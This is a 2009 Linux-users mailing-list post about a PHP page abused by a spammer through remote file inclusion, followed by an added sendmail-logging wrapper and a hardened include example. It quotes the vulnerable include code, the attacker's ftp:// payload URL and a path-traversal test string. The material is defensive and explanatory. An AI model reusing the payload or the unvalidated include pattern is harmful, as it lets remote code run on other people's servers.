[nSLUG] apache used to generate spam

D G Teed donald.teed at gmail.com
Mon Apr 20 11:39:20 ADT 2009


We caught the problem page at our site being used by
the Brazilian spammer.

There are difficulties tracing the use of mail by php at
multi-domain sites.  Many people have deployed a sendmail
wrapper or pointed to an alternative in php.ini.

There will be better logging of use of the mail function
in PHP 5.3, but until then, you can use a method like
one or both of these to log who and what is calling
mail from php/CGI:

PHP specific:

http://www.iezzi.ch/archives/217

PHP/CGI:

http://gregmaclellan.com/blog/sendmail-wrapper/

In our case, the problem was a newbie's php coding which showed
the php variables with the HREF of an anchor.  They were
passing the page URL within a variable.  The spammer
substituted their own page variable and could include
anything they wanted.

Here is part of the index.php to make it an example:

<p class="button"><a href="index.php?page=Home">Home</a></p>
...
<?php
        // The page name comes straight from the query string and is turned
        // into a file name with no validation at all.
        if ( isset( $_GET['page'] ) ) $this = $_GET['page'] . '.html';

        // file_exists() and include_once both accept URL wrappers, so with
        // allow_url_fopen/allow_url_include on, a remote ftp:// or http://
        // path is fetched and executed here.
        if ( file_exists( $this ) ) {
                include_once $this;
        }

The spammer calls this page with their own value set as:

?this=ftp://wheelingboys.com.br:515151@wheelingboys.com.br/fotos/wallpaper/jamaican.php?

I logged in and didn't find the file there just now - just curious to see.

What I'd like to know is how the spammers find exploitable code like this?
The page is an obscure one at our site.  Is the PHP derived from
sample code from the pages of some 90's text book on PHP?
The anchor is the only part of the above which appears from view source.

--Donald
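The sendmail-wrapper approach mentioned above, as an added example that is not code from the original post or from the two linked pages: a small PHP script installed as `sendmail_path` that records who called mail() and then hands the message to the real sendmail. The log file and sendmail paths are assumptions; adjust them for the host.

```php
#!/usr/bin/env php
<?php
// Added example, not from the original post or the linked pages: a sendmail
// wrapper that logs each call to PHP's mail() and forwards the message.
// Install it executable and point php.ini at it, for example
//   sendmail_path = "/usr/local/bin/php-mail-wrapper.php -t -i"
// The two paths below are assumptions for this example.
$logFile      = '/var/log/php-mail.log';
$realSendmail = '/usr/sbin/sendmail';
date_default_timezone_set('UTC');   // avoid a timezone notice in the log line

// PHP changes into the script's directory before running a web request, and
// the popen()ed sendmail inherits that cwd, so getcwd() identifies the calling
// site even under mod_php. SCRIPT_FILENAME and REMOTE_ADDR are only in the
// environment under CGI/FastCGI, so they are logged when present.
$script = getenv('SCRIPT_FILENAME');
$client = getenv('REMOTE_ADDR');

// mail() writes headers, a blank line and the body to our stdin.
$message  = stream_get_contents(STDIN);
$unixText = preg_replace('/\r?\n/', "\n", $message);
$parts    = explode("\n\n", $unixText, 2);
$headers  = $parts[0];

// Pull the three headers most useful for spotting abuse.
$fields = array();
foreach (array('From', 'To', 'Subject') as $name) {
    $fields[$name] = preg_match('/^' . $name . ':[ \t]*(.*)$/mi', $headers, $m)
        ? trim($m[1]) : '-';
}

$entry = sprintf("%s uid=%d cwd=%s script=%s client=%s from=%s to=%s subject=%s\n",
    date('c'), getmyuid(), getcwd(),
    $script !== false ? $script : '-',
    $client !== false ? $client : '-',
    $fields['From'], $fields['To'], $fields['Subject']);
file_put_contents($logFile, $entry, FILE_APPEND | LOCK_EX);

// Forward the unchanged message, with whatever arguments php.ini passed
// (normally -t -i), to the real sendmail and return its exit status.
$cmd = escapeshellarg($realSendmail);
foreach (array_slice($argv, 1) as $arg) {
    $cmd .= ' ' . escapeshellarg($arg);
}
$proc = proc_open($cmd, array(0 => array('pipe', 'r'), 1 => STDOUT, 2 => STDERR), $pipes);
if (!is_resource($proc)) {
    exit(75);   // EX_TEMPFAIL: mail() reports failure instead of silently losing mail
}
fwrite($pipes[0], $message);
fclose($pipes[0]);
exit(proc_close($proc));
```

The log file must be writable by every user PHP runs as (the web server user under mod_php, each site's user under suPHP or CGI). The cwd field is the one to grep for when a burst of outbound mail appears: it names the directory of the script that called mail(), which is exactly the information the post says is hard to get on a multi-domain host.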
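The include bug from the post beside a hardened version, as an added example that is not code from the original post. It runs the attacker's value quoted above through both forms. The pages directory, the page list and the temporary test layout are assumptions for this example.

```php
<?php
// Added example, not from the original post: the vulnerable page-include
// pattern next to a hardened one, exercised with the value the spammer used.
// The pages directory layout and the allowed page list are assumptions.

// Vulnerable form, behaving as the post describes: the query value becomes a
// file name with no validation, so "ftp://host/x.php?" or "../../etc/passwd"
// go straight to include_once.
function vulnerable_page_path($page)
{
    return $page . '.html';
}

// Hardened form: accept only names from a fixed list, require a bare word,
// and confirm the canonical path still lies under $pagesDir.
function safe_page_path($page, $pagesDir, array $allowed = array('Home', 'About', 'Contact'))
{
    if (!is_string($page) || !in_array($page, $allowed, true)) {
        return null;                              // ?page[]=x or an unknown name
    }
    if (!preg_match('/\A[A-Za-z0-9_]+\z/', $page)) {
        return null;                              // no slashes, dots or URL schemes
    }
    $base = realpath($pagesDir);
    $real = realpath($pagesDir . DIRECTORY_SEPARATOR . $page . '.html');
    if ($base === false || $real === false) {
        return null;                              // directory or page file missing
    }
    if (strpos($real, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;                              // a symlink escaped the directory
    }
    return $real;
}

// Constructed test layout: a temporary pages/ directory holding Home.html.
$pagesDir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'rfi-example-' . getmypid();
mkdir($pagesDir, 0700);
file_put_contents($pagesDir . DIRECTORY_SEPARATOR . 'Home.html', "<h1>Home</h1>\n");

$inputs = array(
    'Home',
    'ftp://wheelingboys.com.br:515151@wheelingboys.com.br/fotos/wallpaper/jamaican.php?',
    '../../../../etc/passwd',
);
foreach ($inputs as $in) {
    printf("input=%s\n  vulnerable: %s\n  hardened:   %s\n",
        $in, vulnerable_page_path($in), var_export(safe_page_path($in, $pagesDir), true));
}

unlink($pagesDir . DIRECTORY_SEPARATOR . 'Home.html');
rmdir($pagesDir);

// In index.php the hardened function replaces the original lines:
//   $file = safe_page_path(isset($_GET['page']) ? $_GET['page'] : 'Home',
//                          dirname(__FILE__) . '/pages');
//   if ($file !== null) { include_once $file; } else { header('HTTP/1.0 404 Not Found'); }
```

The whitelist is the real control; the character class and the realpath check are defence in depth for when someone later grows the list from a directory listing. Independently of the code, set `allow_url_include = Off` in php.ini (PHP 5.2 and later), and `allow_url_fopen = Off` where the application can live without it, so that `include` refuses ftp:// and http:// wrappers no matter what a script passes to it.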

